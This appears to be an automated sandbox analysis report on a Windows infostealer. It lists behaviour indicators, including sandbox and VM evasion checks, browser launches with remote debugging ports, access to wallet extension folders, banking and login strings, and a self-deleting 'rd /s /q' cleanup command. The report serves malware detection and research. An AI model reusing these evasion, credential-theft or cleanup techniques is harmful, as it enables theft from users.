                  Source: ktyihkdfesf.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_004054A0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_0041C450
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_0041B0B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_0041A340
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_0041DD60
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_0041CF70
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_0041D3F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: String function: 00410340 appears 127 times
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: String function: 00404DF0 appears 77 times
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: String function: 004119B0 appears 43 times
                  Source: ktyihkdfesf.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@72/277@22/19
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Code function: 0_2_00412050 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,OpenProcess,TerminateProcess,CloseHandle,0_2_00412050
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\1462OIB4.htm
                  Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8744:120:WilError_03
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; File created: C:\Users\user\AppData\Local\Temp\01e7cc52-312d-41c1-a817-87be6e3048ce.tmp
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: ktyihkdfesf.exe, 00000000.00000003.2418278650.00000000035E5000.00000004.00000020.00020000.00000000.sdmp, ktyihkdfesf.exe, 00000000.00000002.2790355832.000000000388B000.00000004.00000020.00020000.00000000.sdmp, F3WB1NY58.0.dr, LFKFUKFUS.0.dr; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: ktyihkdfesf.exe; Virustotal: Detection: 45%
                  Source: ktyihkdfesf.exe; ReversingLabs: Detection: 55%
                  Source: unknown; Process created: C:\Users\user\Desktop\ktyihkdfesf.exe "C:\Users\user\Desktop\ktyihkdfesf.exe"
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2348,i,3398562599031357926,1603104178569398074,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2564 --field-trial-handle=2228,i,2139828529892091342,11985651726309101408,262144 /prefetch:3
                  Source: unknown; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2996 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6600 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6744 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7152 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\K6FKFCT00ZU3" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6792 --field-trial-handle=2252,i,10363767495117335472,2457058755641428801,262144 /prefetch:8
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: rstrtmgr.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: dbghelp.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exe; Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: ktyihkdfesf.exeStatic PE information: section name: .00cfg

                  Boot Survival

                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: ktyihkdfesf.exeBinary or memory string: DIR_WATCH.DLL
                  Source: ktyihkdfesf.exeBinary or memory string: SBIEDLL.DLL
                  Source: ktyihkdfesf.exeBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                  Source: ktyihkdfesf.exeBinary or memory string: API_LOG.DLL
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeEvaded block: after key decisiongraph_0-14791
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-12846
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 8664Thread sleep count: 89 > 30
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00407060 FindFirstFileA,strlen,FindFirstFileA,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00410BA0 GetSystemInfo,wsprintfA,0_2_00410BA0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: XBS26P.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: XBS26P.0.drBinary or memory string: discord.comVMware20,11696487552f
                  Source: XBS26P.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: XBS26P.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000075F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.000000000074D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: XBS26P.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: global block list test formVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: XBS26P.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: XBS26P.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: XBS26P.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: XBS26P.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: XBS26P.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: XBS26P.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: XBS26P.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: XBS26P.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: XBS26P.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: XBS26P.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: XBS26P.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: XBS26P.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: ktyihkdfesf.exe, 00000000.00000002.2788484418.00000000006EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@%u%SystemRoot%\system32\mswsock.dll
                  Source: XBS26P.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeAPI call chain: ExitProcess graph end nodegraph_0-12444
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeAPI call chain: ExitProcess graph end nodegraph_0-13068
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeAPI call chain: ExitProcess graph end nodegraph_0-12446
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\ktyihkdfesf.exeCode function: 0_2_00401170 mov eax, dword ptr fs:[00000030h]0_2_00401170
